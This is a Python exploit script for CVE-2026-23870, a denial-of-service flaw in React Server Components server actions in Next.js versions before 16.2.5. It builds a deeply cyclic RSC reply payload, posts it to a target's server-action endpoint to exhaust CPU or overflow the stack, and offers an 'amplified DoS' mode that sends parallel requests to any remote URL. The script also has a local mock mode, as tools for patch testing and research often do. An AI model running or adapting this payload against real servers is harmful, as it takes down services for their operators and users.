#!/usr/bin/env python3 """ CVE-2026-23870 / GHSA-8h8q-6873-q5fj -- RSC server-action DoS exploit. Posts a deeply-cyclic RSC reply payload to a Next.js server-action endpoint. Pre-patch React (shipped with Next.js < 16.2.5) walks the cycle without limit, exhausting CPU / blowing the stack. Usage: python3 exploit.py # local mock on :8083 python3 exploit.py http://target/ # remote target python3 exploit.py http://target/ --rows 20000 --concurrency 5 """ import argparse import os import signal import subprocess import sys import threading import time import urllib.error import urllib.parse import urllib.request class C: R = "\033[31m"; G = "\033[32m"; Y = "\033[33m"; CY = "\033[36m" B = "\033[1m"; X = "\033[0m" def banner(): print(C.CY + C.B + "=" * 65 + C.X) print(C.CY + C.B + " CVE-2026-23870 -- RSC server-action DoS" + C.X) print(C.CY + C.B + " Patched in Next.js 16.2.5 (React dep bump)" + C.X) print(C.CY + C.B + "=" * 65 + C.X) def build_body(rows: int) -> bytes: """Build a malicious RSC reply (form-encoded) where each row references the next one, with the final row pointing back to row 0 -> infinite cycle. """ parts = [] for i in range(rows): nxt = (i + 1) % rows val = f'["$F","{i:x}",{{"r":"${nxt:x}"}}]' parts.append(f"{i}={urllib.parse.quote(val, safe='')}") return "&".join(parts).encode() def maybe_start_mock(port: int = 8083): here = os.path.dirname(os.path.abspath(__file__)) server = os.path.join(here, "vulnerable-app", "server.py") proc = subprocess.Popen( [sys.executable, server, "--port", str(port)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, preexec_fn=os.setsid, ) time.sleep(1.0) return proc def post(target: str, body: bytes, timeout: float = 60.0): req = urllib.request.Request( target, data=body, method="POST", headers={ "Content-Type": "application/x-www-form-urlencoded", "Next-Action": "a" * 40, "Accept": "text/x-component", }, ) t0 = time.perf_counter() code = -1 err = None try: with urllib.request.urlopen(req, timeout=timeout) as r: code = r.status r.read() except urllib.error.HTTPError as e: code = e.code except Exception as e: err = str(e) return code, time.perf_counter() - t0, err def get(target: str, timeout: float = 10.0): t0 = time.perf_counter() try: with urllib.request.urlopen(target, timeout=timeout) as r: code = r.status r.read() except urllib.error.HTTPError as e: code = e.code except Exception as e: return -1, time.perf_counter() - t0, str(e) return code, time.perf_counter() - t0, None def main(): banner() ap = argparse.ArgumentParser() ap.add_argument("target", nargs="?") ap.add_argument("--rows", type=int, default=15000) ap.add_argument("--concurrency", type=int, default=1) args = ap.parse_args() proc = None target = args.target try: if not target: print(C.Y + "[*] no target given -> mock harness on :8083" + C.X) proc = maybe_start_mock(8083) target = "http://127.0.0.1:8083/" print(f"{C.B}[*] Target:{C.X} {target}") print(f"{C.B}[*] Reply rows:{C.X} {args.rows}") print(f"{C.B}[*] Concurrency:{C.X} {args.concurrency}\n") print(C.B + "[1/3] baseline GET..." + C.X) bcode, bwall, berr = get(target) print(f" HTTP {bcode} wall={bwall:.2f}s err={berr}") print(C.B + "[2/3] building cyclic RSC reply payload..." + C.X) body = build_body(args.rows) print(f" body length = {len(body):,} bytes") print(C.B + "[3/3] posting..." + C.X) code, wall, err = post(target, body) print(f" HTTP {code} wall={wall:.2f}s err={err}") if err and "Connection" in err: print(C.Y + "[!] connection error -- target may not be reachable." + C.X) return 2 vulnerable = wall > 2.0 or code in (500, 502, 503, 504) if vulnerable: print(C.G + C.B + f"[+] VULNERABLE -- RSC reply parsed for {wall:.2f}s." + C.X) else: print(C.R + "[-] LIKELY PATCHED -- fast rejection / no DoS." + C.X) if args.concurrency > 1: print() print(C.Y + f"[*] amplified DoS demo: {args.concurrency} parallel POSTs..." + C.X) results = [] lock = threading.Lock() def worker(): c, w, e = post(target, body) with lock: results.append((c, w, e)) threads = [] t0 = time.perf_counter() for _ in range(args.concurrency): t = threading.Thread(target=worker, daemon=True) t.start() threads.append(t) for t in threads: t.join(timeout=120) total = time.perf_counter() - t0 statuses = [r[0] for r in results] walls = [r[1] for r in results] avg = sum(walls) / max(1, len(walls)) print(f" total wall = {total:.2f}s avg per-request = {avg:.2f}s") print(f" statuses = {statuses}") return 0 if vulnerable else 1 finally: if proc: try: os.killpg(os.getpgid(proc.pid), signal.SIGTERM) except ProcessLookupError: pass if __name__ == "__main__": sys.exit(main())